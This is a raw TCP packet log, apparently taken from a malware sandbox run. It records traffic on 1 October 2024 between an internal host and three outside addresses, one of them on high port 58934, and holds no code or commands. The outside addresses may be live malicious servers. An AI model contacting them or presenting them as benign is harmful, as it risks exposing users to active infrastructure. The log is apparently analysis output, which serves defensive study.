                                                                                                                                Oct 1, 2024 09:25:30.536792994 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.536792994 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.536803961 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.536814928 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.536823988 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.536827087 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.536839962 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.536850929 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.536858082 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.536861897 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.536873102 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.536876917 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.536884069 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.536895037 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.536895990 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.536906004 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.536935091 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.536967039 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.537503004 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.537513971 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.537524939 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.537535906 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.537545919 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.537565947 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.537590981 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.573298931 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.573335886 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.573365927 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.573388100 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.573405981 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.573419094 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.573430061 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.573462009 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.573514938 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.573514938 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.573532104 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.622551918 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.622567892 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.622579098 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.622698069 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.622714043 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.622725964 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.622734070 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.622736931 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.622769117 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.622874022 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.622885942 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.622895956 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.622900963 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.622911930 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.622930050 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.622931004 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.622951031 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.623073101 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623120070 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623125076 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.623131990 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623142958 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623156071 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623167038 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623167992 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.623177052 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623187065 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623198032 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623199940 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.623209000 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623219013 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623225927 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.623234987 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.623258114 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.623265028 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623276949 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623291016 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623301983 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623311996 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623322010 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.623322964 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623333931 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623336077 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.623363972 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.623425961 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623481989 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.623589993 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623601913 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623641968 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.623670101 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623682022 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623691082 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623702049 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623714924 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623716116 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.623745918 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623749018 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.623755932 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.623791933 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.624154091 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.624165058 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.624176025 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.624187946 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.624200106 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.624202967 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.624222040 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.624315023 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.624327898 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.624337912 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.624347925 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.624358892 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.624362946 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.624370098 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.624392986 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.624633074 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.624644041 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.624656916 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.624666929 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.624676943 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.624681950 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.624689102 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.624701023 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.624701977 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.624711990 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.624725103 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.624728918 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.624744892 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.838896036 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:31.395440102 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:31.648798943 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:31.653706074 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:31.654102087 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:31.660691977 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:31.666306019 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:32.579986095 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:32.788888931 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:32.791174889 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:32.791235924 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:32.864391088 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:32.868449926 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:32.873325109 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:32.873383999 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:32.878175974 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:33.519982100 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:33.711755991 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:33.734061003 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:33.802294016 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:33.830118895 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:33.835325003 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:33.835439920 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:33.965526104 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:33.970555067 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:34.036966085 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:34.162358046 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:25:34.167216063 CEST8049174178.237.33.50192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:34.167275906 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:25:34.168325901 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:25:34.173101902 CEST8049174178.237.33.50192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:34.781968117 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:34.799901009 CEST8049174178.237.33.50192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:34.799977064 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:25:34.804599047 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:34.810441971 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:34.988681078 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:34.991210938 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:34.991300106 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.069417000 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.073494911 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.078324080 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.078397989 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.083236933 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.706787109 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.706811905 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.706825972 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.706928015 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.706949949 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.706965923 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.706981897 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.706986904 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.707067966 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.707067966 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.707091093 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.707107067 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.707125902 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.707158089 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.707686901 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.707703114 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.707740068 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.798163891 CEST8049174178.237.33.50192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.798386097 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:25:35.909060001 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.932439089 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.932586908 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.932595015 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.932601929 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.932609081 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.932754040 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.932943106 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.932993889 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.933016062 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.933027983 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.933060884 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.933099031 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.933109999 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.933151960 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.933871984 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.933936119 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.933949947 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.933980942 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.934015036 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.934025049 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.934056997 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.934806108 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.934851885 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.934859991 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.934870958 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.934906960 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.934956074 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.934968948 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.935009003 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.935703039 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.935755968 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.935765982 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:35.935797930 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:35.966793060 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.019285917 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.172333956 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.172350883 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.172364950 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.172425985 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.172420979 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.172442913 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.172454119 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.172466040 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.172522068 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.172523022 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.172523022 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.172538042 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.172549963 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.172591925 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.173216105 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.173276901 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.173317909 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.173361063 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.173372984 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.173383951 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.173429966 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.173891068 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.173902035 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.173912048 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.173923969 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.173942089 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.173970938 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.173980951 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.173991919 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.174004078 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.174015999 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.174031973 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.174072027 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.174814939 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.174827099 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.174839020 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.174850941 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.174860954 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.174870968 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.174902916 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.174906969 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.174915075 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.174956083 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.175470114 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.175652027 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.175700903 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.175713062 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.175740004 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.175745964 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.175789118 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.178431988 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.407147884 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.407171011 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.407179117 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.407243967 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.407253981 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.407263994 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.407274961 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.407432079 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.407444000 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.407470942 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.407470942 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.408082008 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.408116102 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.408126116 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.408138990 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.408170938 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.408225060 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.408236027 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.408277988 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.408618927 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.408675909 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.408687115 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.408726931 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.408799887 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.408809900 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.408823013 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.408838987 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.408852100 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.408879995 CEST4917358934192.168.2.22103.186.116.99
